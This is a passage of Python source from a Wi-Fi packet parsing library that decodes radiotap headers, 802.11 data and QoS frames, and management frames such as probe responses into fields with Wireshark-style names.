def strip_dbm_tx_power(self, idx):
"""strip(1 byte) dbm_tx_power
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 1)
dbm_tx_power, = struct.unpack_from('<b', self._rtap, idx)
return idx + 1, dbm_tx_power
def strip_antenna(self, idx):
"""strip(1 byte) radiotap.antenna
:return: int
idx
:return: int
"""
antenna, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, antenna
def strip_db_antsignal(self, idx):
"""strip(1 byte) radiotap.db_antsignal
:return: int
idx
:return: int
"""
db_antsignal, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, db_antsignal
def strip_db_antnoise(self, idx):
"""strip(1 byte) radiotap.db_antnoise
:return: int
idx
:return: int
"""
db_antnoise, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, db_antnoise
def strip_rx_flags(self, idx):
"""strip(2 byte) radiotap.rxflags
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
rx_flags = collections.namedtuple('rx_flags', ['reserved', 'badplcp'])
idx = Radiotap.align(idx, 2)
flags, = struct.unpack_from('<H', self._rtap, idx)
flag_bits = format(flags, '08b')[::-1]
rx_flags.reserved = int(flag_bits[0])
rx_flags.badplcp = int(flag_bits[1])
return idx + 2, rx_flags
def strip_tx_flags(self, idx):
"""strip(1 byte) tx_flags
:idx: int
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 2)
tx_flags, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, tx_flags
def strip_rts_retries(self, idx):
"""strip(1 byte) rts_retries
:idx: int
:return: int
idx
:return: int
"""
rts_retries, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, rts_retries
def strip_data_retries(self, idx):
"""strip(1 byte) data_retries
:idx: int
:return: int
idx
:return: int
"""
data_retries, = struct.unpack_from('<B', self._rtap, idx)
return idx + 1, data_retries
def strip_xchannel(self, idx):
"""strip(7 bytes) radiotap.xchannel.channel(1 byte),
radiotap.xchannel.freq(2 bytes) and radiotap.xchannel.flags(4 bytes)
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
xchannel = collections.namedtuple(
'xchannel', ['flags', 'freq', 'channel', 'max_power'])
flags = collections.namedtuple(
'flags', ['turbo', 'cck', 'ofdm', 'two_g', 'five_g', 'passive',
'dynamic', 'gfsk', 'gsm', 'sturbo', 'half', 'quarter',
'ht_20', 'ht_40u', 'ht_40d'])
idx = Radiotap.align(idx, 2)
flag_val, freq, channel, max_power = struct.unpack_from('<lHBB', self._rtap, idx)
xchannel.freq = freq
xchannel.channel = channel
xchannel.max_power = max_power
bits = format(flag_val, '032b')[::-1]
flags.turbo = int(bits[4])
flags.cck = int(bits[5])
flags.ofdm = int(bits[6])
flags.two_g = int(bits[7])
flags.five_g = int(bits[8])
flags.passive = int(bits[9])
flags.dynamic = int(bits[10])
flags.gfsk = int(bits[11])
flags.gsm = int(bits[12])
flags.sturbo = int(bits[13])
flags.half = int(bits[14])
flags.quarter = int(bits[15])
flags.ht_20 = int(bits[16])
flags.ht_40u = int(bits[17])
flags.ht_40d = int(bits[18])
xchannel.flags = flags
return idx + 8, xchannel
def strip_mcs(self, idx):
"""strip(3 byte) radiotap.mcs which contains 802.11n bandwidth,
mcs(modulation and coding scheme) and stbc(space time block coding)
information.
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
mcs = collections.namedtuple(
'mcs', ['known', 'index', 'have_bw', 'have_mcs', 'have_gi',
'have_format', 'have_fec', 'have_stbc', 'have_ness',
'ness_bit1'])
idx = Radiotap.align(idx, 1)
known, flags, index = struct.unpack_from('<BBB', self._rtap, idx)
bits = format(flags, '032b')[::-1]
mcs.known = known # Known MCS information
mcs.index = index # MCS index
mcs.have_bw = int(bits[0]) # Bandwidth
mcs.have_mcs = int(bits[1]) # MCS
mcs.have_gi = int(bits[2]) # Guard Interval
mcs.have_format = int(bits[3]) # Format
mcs.have_fec = int(bits[4]) # FEC(Forward Error Correction) type
mcs.have_stbc = int(bits[5]) # Space Time Block Coding
mcs.have_ness = int(bits[6]) # Number of Extension Spatial Streams
mcs.ness_bit1 = int(bits[7]) # Number of Extension Spatial Streams bit 1
return idx + 3, mcs
def strip_ampdu(self, idx):
"""strip(8 byte) radiotap.ampdu
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
ampdu = collections.namedtuple(
'ampdu', ['reference', 'crc_val', 'reserved', 'flags'])
flags = collections.namedtuple(
'flags', ['report_zerolen', 'is_zerolen', 'lastknown', 'last',
'delim_crc_error'])
idx = Radiotap.align(idx, 4)
refnum, flag_vals, crc_val, reserved = struct.unpack_from('<LHBB', self._rtap, idx)
ampdu.flags = flags
ampdu.reference = refnum
ampdu.crc_val = crc_val
ampdu.reserved = reserved
bits = format(flag_vals, '032b')[::-1]
ampdu.flags.report_zerolen = int(bits[0])
ampdu.flags.is_zerolen = int(bits[1])
ampdu.flags.lastknown = int(bits[2])
ampdu.flags.last = int(bits[3])
ampdu.flags.delim_crc_error = int(bits[4])
return idx + 8, ampdu
def strip_vht(self, idx):
"""strip(12 byte) radiotap.vht
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
vht = collections.namedtuple(
'vht', ['known_bits', 'have_stbc', 'have_txop_ps', 'have_gi',
'have_sgi_nsym_da', 'have_ldpc_extra', 'have_beamformed',
'have_bw', 'have_gid', 'have_paid', 'stbc', 'txop_ps', 'gi',
'sgi_nysm_da', 'ldpc_extra', 'group_id', 'partial_id',
'beamformed', 'user_0', 'user_1', 'user_2', 'user_3'])
user = collections.namedtuple('user', ['nss', 'mcs', 'coding'])
idx = Radiotap.align(idx, 2)
known, flags, bw = struct.unpack_from('<HBB', self._rtap, idx)
mcs_nss_0, mcs_nss_1, mcs_nss_2, mcs_nss_3 = struct.unpack_from('<BBBB', self._rtap, idx + 4)
coding, group_id, partial_id = struct.unpack_from('<BBH', self._rtap, idx + 8)
known_bits = format(known, '032b')[::-1]
vht.known_bits = known_bits
vht.have_stbc = int(known_bits[0]) # Space Time Block Coding
vht.have_txop_ps = int(known_bits[1]) # TXOP_PS_NOT_ALLOWED
vht.have_gi = int(known_bits[2]) # Short/Long Guard Interval
vht.have_sgi_nsym_da = int(known_bits[3]) # Short Guard Interval Nsym Disambiguation
vht.have_ldpc_extra = int(known_bits[4]) # LDPC(Low Density Parity Check)
vht.have_beamformed = int(known_bits[5]) # Beamformed
vht.have_bw = int(known_bits[6]) # Bandwidth
vht.have_gid = int(known_bits[7]) # Group ID
vht.have_paid = int(known_bits[8]) # Partial AID
flag_bits = format(flags, '032b')[::-1]
vht.flag_bits = flag_bits
vht.stbc = int(flag_bits[0])
vht.txop_ps = int(flag_bits[1])
vht.gi = int(flag_bits[2])
vht.sgi_nysm_da = int(flag_bits[3])
vht.ldpc_extra = int(flag_bits[4])
vht.beamformed = int(flag_bits[5])
vht.group_id = group_id
vht.partial_id = partial_id
vht.bw = bw
vht.user_0 = user(None, None, None)
vht.user_1 = user(None, None, None)
vht.user_2 = user(None, None, None)
vht.user_3 = user(None, None, None)
for (i, mcs_nss) in enumerate([mcs_nss_0, mcs_nss_1, mcs_nss_2, mcs_nss_3]):
if mcs_nss:
nss = mcs_nss & 0x0f # number of spatial streams is the low nibble
mcs = (mcs_nss & 0xf0) >> 4
coding = (coding & 2**i) >> i
if i == 0:
vht.user_0 = user(nss, mcs, coding)
elif i == 1:
vht.user_1 = user(nss, mcs, coding)
elif i == 2:
vht.user_2 = user(nss, mcs, coding)
elif i == 3:
vht.user_3 = user(nss, mcs, coding)
return idx + 12, vht
def extract_protocol(self):
"""extract 802.11 protocol from radiotap.channel.flags
:return: str
protocol name
one of below in success
[.11a, .11b, .11g, .11n, .11ac]
None in fail
"""
if self.present.mcs:
return '.11n'
if self.present.vht:
return '.11ac'
if self.present.channel and hasattr(self, 'chan'):
if self.chan.five_g:
if self.chan.ofdm:
return '.11a'
elif self.chan.two_g:
if self.chan.cck:
return '.11b'
elif self.chan.ofdm or self.chan.dynamic:
return '.11g'
return 'None'
@staticmethod
def align(val, align):
"""
:val: int
:align: int
:return: int
"""
return (val + align - 1) & ~(align - 1)
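# Worked example for the alignment helper above (illustrative only): radiotap fields are
# unpacked at their natural alignment, so an offset is rounded up to the next multiple of
# `align` before reading.
#
#     Radiotap.align(3, 2)  # -> 4
#     Radiotap.align(5, 4)  # -> 8
#     Radiotap.align(8, 4)  # -> 8 (already aligned, unchanged)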
class Wifi(ctypes.Structure):
"""Base Wi-Fi Packet"""
_fields_ = [('name', ctypes.c_char_p), # name of packet
('vers', ctypes.c_ushort), # version
('category', ctypes.c_ushort), # category
('subtype', ctypes.c_ushort), # subtype
('ds', ctypes.c_char_p), # distribution system
('to_ds', ctypes.c_bool), # to distribution system -> wlan.fc.ds[0]
('from_ds', ctypes.c_bool), # from distribution system -> wlan.fc.ds[1]
('frag', ctypes.c_bool), # more fragments flag
('retry', ctypes.c_bool), # retry
('power_mgmt', ctypes.c_bool), # power management
('order', ctypes.c_bool), # order
('wep', ctypes.c_bool), # wired equivalent privacy
('duration', ctypes.c_uint)] # duration
# Wireshark syntax conjugates of fields in object (base)
_shark_ = {'wlan.fc.version': 'vers',
'wlan.fc.type': 'category',
'wlan.fc.type_subtype': 'subtype',
'wlan.fc.ds': 'ds',
'wlan.fc.frag': 'frag',
'wlan.fc.retry': 'retry',
'wlan.fc.pwrmgt': 'power_mgmt',
'wlan.fc.wep': 'wep',
'wlan.fc.order': 'order',
'wlan.duration': 'duration'}
def __init__(self, frame, no_rtap=False):
"""Constructor method.
Parse common headers of all Wi-Fi frames.
:frame: ctypes.Structure
"""
super(Wifi, self).__init__()
self._raw = {}
if not no_rtap:
rtap_bytes, self._packet = WiHelper._strip_rtap(frame)
self.radiotap = Radiotap(rtap_bytes)
else:
self._packet = frame
self.radiotap = None
f_cntrl = struct.unpack('BB', self._packet[:2]) # frame control
flags = f_cntrl[1]
self.vers = f_cntrl[0] & 0b0011
self.category = (f_cntrl[0] >> 2) & 0b0011
self.subtype = f_cntrl[0] >> 4
flag_bits = format(flags, '08b')[::-1]
self.to_ds = int(flag_bits[0])
self.from_ds = int(flag_bits[1])
self.ds = b''.join([(flag_bits[0]).encode('ascii'),
(flag_bits[1]).encode('ascii')])
self.frag = int(flag_bits[2])
self.retry = int(flag_bits[3])
self.power_mgmt = int(flag_bits[4])
self.more_data = int(flag_bits[5])
self.wep = int(flag_bits[6])
self.order = int(flag_bits[7])
# TODO: parse duration with respect to field/subfield
# since some bits might be reserved for types like data (0x20)
# https://community.arubanetworks.com/t5/Technology-Blog/802-11-Duration-ID-Field/ba-p/235872
self.duration = struct.unpack('H', self._packet[2:4])[0] # us
self.name = None
if self.category == 0:
if self.subtype in _SUBTYPES_[0].keys():
self.name = _SUBTYPES_[0][self.subtype].encode('ascii')
elif self.category == 1:
if self.subtype in _SUBTYPES_[1].keys():
self.name = _SUBTYPES_[1][self.subtype].encode('ascii')
elif self.category == 2:
if self.subtype in _SUBTYPES_[2].keys():
self.name = _SUBTYPES_[2][self.subtype].encode('ascii')
def get_shark_field(self, fields):
"""get parameters via wireshark syntax.
out = x.get_shark_field('wlan.fc.type')
out = x.get_shark_field(['wlan.fc.type', 'wlan.seq'])
:fields: str or str[]
:return: dict
out[fields[0]] = val[0] or None
out[fields[1]] = val[1] or None ...
"""
keys, exist, out = None, {}, None
if isinstance(fields, str):
fields = [fields]
elif not isinstance(fields, list):
logging.error('invalid input type')
return None
out = dict.fromkeys(fields)
if hasattr(self, '_shark_'):
exist.update(self._shark_)
if hasattr(self, '_s_shark_'):
exist.update(self._s_shark_)
if hasattr(self.radiotap, '_r_shark_'):
exist.update(self.radiotap._r_shark_)
keys = exist.keys()
for elem in fields:
if elem in keys:
obj_field, tmp = exist[elem], None
try:
tmp = operator.attrgetter(obj_field)(self)
except AttributeError:
tmp = None
if not tmp:
try:
tmp = operator.attrgetter(obj_field)(self.radiotap)
except AttributeError:
tmp = None
out[elem] = tmp
return out
@staticmethod
def get_mac_addr(mac_addr):
"""converts bytes to mac addr format
:mac_addr: ctypes.structure
:return: str
mac addr in format
11:22:33:aa:bb:cc
"""
mac_addr = bytearray(mac_addr)
mac = b':'.join([('%02x' % o).encode('ascii') for o in mac_addr])
return mac
def get_hex_repr(self):
"""wlan.fc.type_subtype hex representation
:return: str
"""
return hex(self.category * 16 + self.subtype)
def strip_mac_addrs(self):
"""strip mac address(each 6 byte) information.
(wlan.ta, wlan.ra, wlan.sa, wlan.da)
(transmitter, receiver, source, destination)
:return: int
index of sequence control
:return: int
index after mac addresses
:return: str
source address (sa)
:return: str
transmitter address (ta)
:return: str
receiver address (ra)
:return: str
destination address (da)
:return: str
basic service set identifier (bssid)
"""
qos_idx, seq_idx = 0, 0
sa, ta, ra, da, bssid = None, None, None, None, None
if self.to_ds == 1 and self.from_ds == 1:
(ra, ta, da) = struct.unpack('!6s6s6s', self._packet[4:22])
sa = struct.unpack('!6s', self._packet[24:30])[0]
qos_idx = 30
seq_idx = 22
elif self.to_ds == 0 and self.from_ds == 1:
(ra, ta, sa) = struct.unpack('!6s6s6s', self._packet[4:22])
qos_idx = 24
seq_idx = 22
elif self.to_ds == 1 and self.from_ds == 0:
(ra, ta, da) = struct.unpack('!6s6s6s', self._packet[4:22])
qos_idx = 24
seq_idx = 22
elif self.to_ds == 0 and self.from_ds == 0:
(ra, ta, bssid) = struct.unpack('!6s6s6s', self._packet[4:22])
qos_idx = 24
seq_idx = 22
if ta is not None:
ta = Wifi.get_mac_addr(ta)
if ra is not None:
ra = Wifi.get_mac_addr(ra)
if sa is not None:
sa = Wifi.get_mac_addr(sa)
if da is not None:
da = Wifi.get_mac_addr(da)
if bssid is not None:
bssid = Wifi.get_mac_addr(bssid)
return seq_idx, qos_idx, sa, ta, ra, da, bssid
def strip_seq_cntrl(self, idx):
"""strip(2 byte) wlan.seq(12 bit) and wlan.fram(4 bit)
number information.
:seq_cntrl: ctypes.Structure
:return: int
sequence number
:return: int
fragment number
"""
seq_cntrl = struct.unpack('H', self._packet[idx:idx + 2])[0]
seq_num = seq_cntrl >> 4
frag_num = seq_cntrl & 0x000f
return seq_num, frag_num
def __repr__(self, show_rfields=True):
"""
:show_rfields: bool
whether to show radiotap fields too.
"""
out_str = ''
all_fields = []
if hasattr(self, '_fields_'):
all_fields += self._fields_
if hasattr(self, '_sfields_'):
all_fields += self._sfields_
if all_fields:
for elem in all_fields:
key = elem[0]
try:
val = operator.attrgetter(key)(self)
except Exception:
val = None
if isinstance(val, list):
if val:
out_str += "{} <list>[{}]\n".format(key, type(val[0]))
else:
out_str += "{} <list>\n".format(str(key))
else:
out_str += "{}: {}\n".format(str(key), str(val))
else:
logging.error('instance does not have any field')
return None
if show_rfields and hasattr(self.radiotap, '_rfields_'):
for elem in self.radiotap._rfields_:
key = elem[0]
try:
val = operator.attrgetter(key)(self.radiotap)
except Exception:
val = None
if val is not None:
out_str += "radiotap.{}: {}\n".format(key, val)
return out_str
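# Illustrative usage sketch (assumes `packet` was produced by WiHelper.get_wifi_packet with
# its radiotap header intact): get_shark_field() accepts a single wireshark-style key or a
# list of keys and returns a dict mapping each requested key to the parsed value, or to
# None when the field is not available.
#
#     packet.get_shark_field('wlan.fc.type')
#     packet.get_shark_field(['wlan.duration', 'radiotap.datarate'])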
class Data(Wifi):
"""Base Data Packet (type: 2)"""
def __init__(self, frame, no_rtap=False):
"""Constructor method.
:packet: ctypes.Structure
:no_rtap: Bool
shall parse radiotap headers
"""
Wifi.__init__(self, frame, no_rtap)
class QosData(Data):
"""Qos Data (type: 2, subtype: 8)"""
_sfields_ = [('sa', ctypes.c_char_p), # source address
('ta', ctypes.c_char_p), # transmitter address
('ra', ctypes.c_char_p), # receiver address
('da', ctypes.c_char_p), # destination address
('seq_num', ctypes.c_uint), # sequence number
('frag_num', ctypes.c_uint), # fragment number
('qos_pri', ctypes.c_uint), # quality of service priority
('qos_bit', ctypes.c_bool), # quality of service bit
('qos_ack', ctypes.c_uint), # quality of service ack
('amsdupresent', ctypes.c_bool), # aggregated mac service data unit
('ccmp_extiv', ctypes.c_uint64), # counter mode cipher block
('payload', list)] # payload
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.sa': 'sa',
'wlan.ta': 'ta',
'wlan.ra': 'ra',
'wlan.da': 'da',
'wlan.seq': 'seq_num',
'wlan.frag': 'frag_num',
'wlan.qos.priority': 'qos_pri',
'wlan.qos.bit4': 'qos_bit',
'wlan.qos.ack': 'qos_ack',
'wlan.qos.amsdupresent': 'amsdupresent',
'wlan.ccmp.extiv': 'ccmp_extiv'}
def __init__(self, frame, no_rtap=False, parse_amsdu=True):
"""Constructor method.
:frame: ctypes.Structure
:parse_amsdu: Bool
shall parse aggregated mac service data unit
"""
Data.__init__(self, frame, no_rtap)
idx = 0
self.sa = self.ta = self.ra = self.da = None
self.seq_num = self.frag_num = None
self.qos_pri = self.qos_bit = self.qos_ack = None
self.ccmp_extiv = None
self.payload = []
seq_idx, qos_idx, self.sa, self.ta, self.ra, self.da, _ = self.strip_mac_addrs()
self.seq_num, self.frag_num = self.strip_seq_cntrl(seq_idx)
idx = qos_idx
incr, self.qos_pri, self.qos_bit, self.qos_ack, self.amsdupresent =\
self.strip_qos_cntrl(idx, self.radiotap.prot_type)
idx += incr
if self.wep == 1:
incr, self.ccmp_extiv = self.strip_ccmp(idx)
idx += incr
if parse_amsdu:
if self.amsdupresent != 0 and self.wep == 0:
while idx < len(self._packet):
msdu, offset = self.strip_msdu(idx)
self.payload.append(msdu)
idx += offset
else:
if self.wep == 0:
msdu = {}
offset, llc = self.strip_llc(idx)
msdu['llc'] = llc
msdu['payload'] = self._packet[idx + offset:]
self.payload.append(msdu)
else:
self.payload.append({'payload': self._packet[idx:]})
def strip_qos_cntrl(self, idx, prot_type):
"""strip(2 byte) wlan.qos
:idx: int
:prot_type: string
802.11 protocol type(.11ac, .11a, .11n, etc)
:return: int
number of processed bytes
:return: int
qos priority
:return: int
qos bit
:return: int
qos acknowledgement
:return: int
amsdupresent(aggregated mac service data unit)
"""
qos_cntrl, = struct.unpack('H', self._packet[idx:idx + 2])
qos_cntrl_bits = format(qos_cntrl, '016b')[::-1]
qos_pri = qos_cntrl & 0x000f
qos_bit = int(qos_cntrl_bits[5])
qos_ack = int(qos_cntrl_bits[6:8], 2)
amsdupresent = 0
if prot_type == '.11ac':
amsdupresent = int(qos_cntrl_bits[7])
return 2, qos_pri, qos_bit, qos_ack, amsdupresent
def strip_ccmp(self, idx):
"""strip(8 byte) wlan.ccmp.extiv
CCMP Extended Initialization Vector
:return: int
number of processed bytes
:return: ctypes.raw
ccmp vector
"""
ccmp_extiv = None
if len(self._packet[idx:]) >= 8:
raw_bytes = self._packet[idx:idx + 8]
ccmp_extiv, = struct.unpack_from('Q', raw_bytes, 0)
return 8, ccmp_extiv
def strip_msdu(self, idx):
"""strip single mac servis data unit(msdu)
see -> https://mrncciew.com/2014/11/01/cwap-802-11-data-frame-aggregation/
:idx: int
:return: dict
msdu
:return: int
number of processed bytes
"""
# length of msdu payload has to be multiple of 4,
# this guaranteed with padding
padding = 0
len_payload = 0
msdu = {
'llc': {},
'wlan.da': None,
'wlan.sa': None,
'payload': None,
'length': 0
}
(da_mac, sa_mac) = struct.unpack('!6s6s', self._packet[idx:idx + 12])
msdu['wlan.da'] = Wifi.get_mac_addr(da_mac)
msdu['wlan.sa'] = Wifi.get_mac_addr(sa_mac)
idx += 12
msdu['length'] = struct.unpack('!H', self._packet[idx:idx + 2])[0]
idx += 2
offset, msdu['llc'] = self.strip_llc(idx)
idx += offset
len_payload = msdu['length'] - offset
msdu['payload'] = self._packet[idx:idx + len_payload]
padding = (4 - (len_payload % 4)) % 4 # no padding needed when the payload is already 4-byte aligned
return msdu, msdu['length'] + padding + 12
def strip_llc(self, idx):
"""strip(4 or 8 byte) logical link control headers
:return: int
number of processed bytes
:return: dict
llc information
see -> http://www.wildpackets.com/resources/compendium/ethernet/frame_snap_iee8023
ABBRVS.
ssap: source service access point
dsap: destination service access point
SNAP(Subnetwork Access Protocol)
"""
llc = {}
snap = 170
llc_dsap = struct.unpack('B', self._packet[idx:idx + 1])[0]
llc['dsap.dsap'] = llc_dsap >> 1
llc['dsap.ig'] = llc_dsap & 0b01
idx += 1
llc_ssap = struct.unpack('B', self._packet[idx:idx + 1])[0]
llc['ssap.sap'] = llc_ssap >> 1
llc['ssap.cr'] = llc_ssap & 0b01
idx += 1
if llc_dsap == snap and llc_ssap == snap:
llc_control = struct.unpack('B', self._packet[idx:idx + 1])[0]
llc['control.u_modifier_cmd'] = llc_control >> 2
llc['control.ftype'] = llc_control & 0x03
idx += 1
llc['organization_code'] = self._packet[idx:idx + 3]
idx += 3
llc['type'] = self._packet[idx:idx + 2]
return 8, llc
else:
return 4, llc
def __str__(self):
frame = "%s (sa: %s, ta: %s, ra: %s, da: %s, ds: %s, seq: %s)"
frame = frame % (self.name, self.sa, self.ta, self.ra, self.da, self.ds, self.seq_num)
return frame
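# Illustrative note (not part of the original module): each entry of QosData.payload is a
# dict. For A-MSDU aggregates it carries 'wlan.da', 'wlan.sa', 'llc', 'length' and
# 'payload'; for plain unencrypted frames only 'llc' and 'payload'; for protected frames
# just the raw 'payload' bytes.
#
#     qos = WiHelper.get_wifi_packet(frame)   # `frame` assumed to be a captured QoS data frame
#     for msdu in qos.payload:
#         print(msdu.get('llc'), len(msdu['payload']))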
class Management(Wifi):
"""Management Packet (type: 0)"""
# commonly exists in some of the subtypes
_capabilities_ = [('ess', ctypes.c_bool), # extended service set
('ibss', ctypes.c_bool), # independent basic service set
('priv', ctypes.c_bool), # privacy
('short_pre', ctypes.c_bool), # short preamble
('pbcc', ctypes.c_bool), # packet binary convolutional code
('chan_agility', ctypes.c_bool), # channel agility
('spec_man', ctypes.c_bool), # spectrum management
('short_slot', ctypes.c_bool), # short slot time
('apsd', ctypes.c_bool), # automatic power save delivery
('radio_meas', ctypes.c_bool), # radio measurement
('dss_ofdm', ctypes.c_bool), # direct spread spectrum
('del_back', ctypes.c_bool), # delayed block acknowledgement
('imm_back', ctypes.c_bool)] # immediate block acknowledgement
_scapabilities_ = {'wlan_mgt.fixed.capabilities.ess': 'ess',
'wlan_mgt.fixed.capabilities.ibss': 'ibss',
'wlan_mgt.fixed.capabilities.priv': 'priv',
'wlan_mgt.fixed.capabilities.preamble': 'short_pre',
'wlan_mgt.fixed.capabilities.pbcc': 'pbcc',
'wlan_mgt.fixed.capabilities.agility': 'chan_agility',
'wlan_mgt.fixed.capabilities.spec_man': 'spec_man',
'wlan_mgt.fixed.capabilities.short_slot_time': 'short_slot',
'wlan_mgt.fixed.capabilities.apsd': 'apsd',
'wlan_mgt.fixed.capabilities.radio_measurement': 'radio_meas',
'wlan_mgt.fixed.capabilities.dss_ofdm': 'dss_ofdm',
'wlan_mgt.fixed.capabilities.del_blk_ack': 'del_back',
'wlan_mgt.fixed.capabilities.imm_blk_ack': 'imm_back'}
def __init__(self, frame, no_rtap=False):
"""Constructor Method
:frame: ctypes.Structure
:subtype: int
"""
Wifi.__init__(self, frame, no_rtap)
self.tagged_params = []
self._raw_tagged_params = None
self.timestamp = None
self.interval = None
self.fixed_capabils = None
def __str__(self):
return self.name
@staticmethod
def parse_tagged_params(raw_tagged_params):
"""strip tagged information elements wlan_mgt.tag
which has generic type-length-value structure
[type, length, value]
type(1 byte), length(1 byte), value(varies)
[wlan_mgt.tag.number, wlan_mgt.tag.length, payload]
structured fields.
:return: dict[]
list of tagged params
:return: int
0 on success, 1 if a tag length points out of packet boundary
"""
fcs_len = 4 # wlan.fcs (4 bytes)
idx = 0
tagged_params = []
while idx < len(raw_tagged_params) - fcs_len:
tag_num, tag_len = struct.unpack('BB', raw_tagged_params[idx:idx + 2])
idx += 2
if len(raw_tagged_params) >= idx + tag_len:
param = {}
param['number'], param['length'] = tag_num, tag_len
payload = raw_tagged_params[idx:idx + tag_len]
if tag_num in MNGMT_TAGS:
param['name'] = MNGMT_TAGS[tag_num]
if MNGMT_TAGS[tag_num] == 'TAG_VENDOR_SPECIFIC_IE':
param['payload'] = Management.parse_vendor_ie(payload)
else:
param['payload'] = payload
else:
param['name'] = None
tagged_params.append(param)
idx += tag_len
else:
logging.warning('tag length header points out of packet boundary')
log_msg = 'index: {p_idx}, pack_len: {p_len}'
log_msg = log_msg.format(p_idx=idx + tag_len,
p_len=len(raw_tagged_params))
logging.warning(log_msg)
return 1, tagged_params
return 0, tagged_params
@staticmethod
def get_fixed_capabils(payload):
"""strip(2 byte) wlan_mgt.fixed.capabilities
:payload: ctypes.structure
2 byte
:return: dict
None in error
"""
if len(payload) != 2:
return None
capabils = {}
fix_cap = struct.unpack('H', payload)[0]
cap_bits = format(fix_cap, '016b')[::-1]
capabils['ess'] = int(cap_bits[0]) # Extended Service Set
capabils['ibss'] = int(cap_bits[1]) # Independent Basic Service Set
capabils['priv'] = int(cap_bits[4]) # Privacy
capabils['short_preamble'] = int(cap_bits[5]) # Short Preamble
capabils['pbcc'] = int(cap_bits[6]) # Packet Binary Convolutional Code
capabils['chan_agility'] = int(cap_bits[7]) # Channel Agility
capabils['spec_man'] = int(cap_bits[8]) # Spectrum Management
capabils['short_slot'] = int(cap_bits[10]) # Short Slot Time
capabils['apsd'] = int(cap_bits[11]) # Automatic Power Save Delivery
capabils['radio_meas'] = int(cap_bits[12]) # Radio Measurement
capabils['dss_ofdm'] = int(cap_bits[13]) # Direct Spread Spectrum
capabils['del_back'] = int(cap_bits[14]) # Delayed Block Acknowledgement
capabils['imm_back'] = int(cap_bits[15]) # Immediate Block Acknowledgement
return capabils
@staticmethod
def parse_vendor_ie(payload):
"""parse vendor specific information element
oui -> organizationally unique identifier
first 3 bytes of mac addresses
see:https://www.wireshark.org/tools/oui-lookup.html
strip wlan_mgt.tag.oui(3 bytes),
wlan_mgt.tag.vendor.oui.type(1 byte)
wlan_mgt.tag.vendor.data (varies)
:payload: ctypes.structure
:return: dict
{'oui':00-11-22, 'oui_type':1, 'oui_data':ctypes.structure}
"""
output = {}
oui = struct.unpack('BBB', payload[0:3])
oui = b'-'.join([('%02x' % o).encode('ascii') for o in oui])
oui_type = struct.unpack('B', payload[3:4])[0]
oui_data = payload[4:]
output['oui'] = oui.upper()
output['oui_type'] = oui_type
output['oui_data'] = oui_data
return output
@staticmethod
def get_timestamp(payload):
"""strip wlan_mgt.fixed.timestamp(8 bytes)
:payload: ctypes.structure
:return: int
None on error
"""
if len(payload) != 8:
return None
timestamp = struct.unpack('Q', payload)[0]
return timestamp
@staticmethod
def get_interval(payload):
"""strip wlan_mgt.fixed.beacoN(2 bytes)
beacon interval
:payload: ctypes.structure
:return: int
None on error
"""
if len(payload) != 2:
return None
interval = struct.unpack('H', payload)[0]
return interval
@staticmethod
def strip_fixed_params(payload):
"""strip(12 byte) wlan_mgt.fixed.all
:payload: ctypes.structure
:return: int
timestamp
:return: int
beacon interval
:return: dict
capabilities
"""
if len(payload) != 12:
return None, None, None
idx = 0
timestamp = Management.get_timestamp(payload[idx:idx + 8])
idx += 8
interval = Management.get_interval(payload[idx:idx + 2])
idx += 2
capabils = Management.get_fixed_capabils(payload[idx:idx + 2])
return timestamp, interval, capabils
@staticmethod
def is_valid_mac_oui(mac_block):
"""checks whether mac block is in format of
00-11-22 or 00:11:22.
:return: int
"""
if len(mac_block) != 8:
return 0
if ':' in mac_block:
if len(mac_block.split(':')) != 3:
return 0
elif '-' in mac_block:
if len(mac_block.split('-')) != 3:
return 0
return 1
def set_fixed_capabils(self, capabils):
"""set keys of capabils into fields of object
:capabils: dict
"""
self.ess = capabils['ess']
self.ibss = capabils['ibss']
self.priv = capabils['priv']
self.short_preamble = capabils['short_preamble']
self.pbcc = capabils['pbcc']
self.chan_agility = capabils['chan_agility']
self.spec_man = capabils['spec_man']
self.short_slot = capabils['short_slot']
self.apsd = capabils['apsd']
self.radio_meas = capabils['radio_meas']
self.dss_ofdm = capabils['dss_ofdm']
self.del_back = capabils['del_back']
self.imm_back = capabils['imm_back']
def get_vendor_ies(self, mac_block=None, oui_type=None):
"""vendor information element querying
:mac_block: str
first 3 bytes of mac addresses in format of
00-11-22 or 00:11:22 or 001122
:oui_type: int
vendor specific ie type
:return: dict[]
list of matching vendor specific information elements
None if the mac_block format is invalid
"""
vendor_ies = []
if mac_block is not None:
if Management.is_valid_mac_oui(mac_block):
mac_block = mac_block.upper()
if ':' in mac_block:
mac_block = mac_block.replace(':', '-')
else:
logging.warning("invalid oui macblock")
return None
for elem in self.tagged_params:
tag_num = elem['number']
if MNGMT_TAGS[tag_num] == 'TAG_VENDOR_SPECIFIC_IE':
if mac_block is None:
vendor_ies.append(elem)
elif elem['payload']['oui'] == mac_block.encode('ascii'):
if oui_type is None:
vendor_ies.append(elem)
elif elem['payload']['oui_type'] == oui_type:
vendor_ies.append(elem)
return vendor_ies
class ProbeResp(Management):
"""Probe Response (type: 0, subtype: 5)"""
_sfields_ = [('ra', ctypes.c_char_p), # receiver address
('ta', ctypes.c_char_p), # transmitter address
('bssid', ctypes.c_char_p), # basic service set identifier
('frag_num', ctypes.c_uint), # fragment number
('seq_num', ctypes.c_uint), # sequence number
('timestamp', ctypes.c_uint64), # timestamp
('interval', ctypes.c_uint), # interval
('tagged_params', list)] # tagged parameters
# Wireshark syntax conjugates of fields in object (subfield shark)
_s_shark_ = {'wlan.ta': 'ta',
'wlan.ra': 'ra',
'wlan.bssid': 'bssid',
'wlan.frag': 'frag_num',
'wlan.seq': 'seq_num',
'wlan_mgt.fixed.timestamp': 'timestamp',
'wlan_mgt.fixed.beacon': 'interval',
'wlan_mgt.tagged.all': 'tagged_params'}
_sfields_ += Management._capabilities_
_s_shark_.update(Management._scapabilities_)
def __init__(self, frame, no_rtap=False):
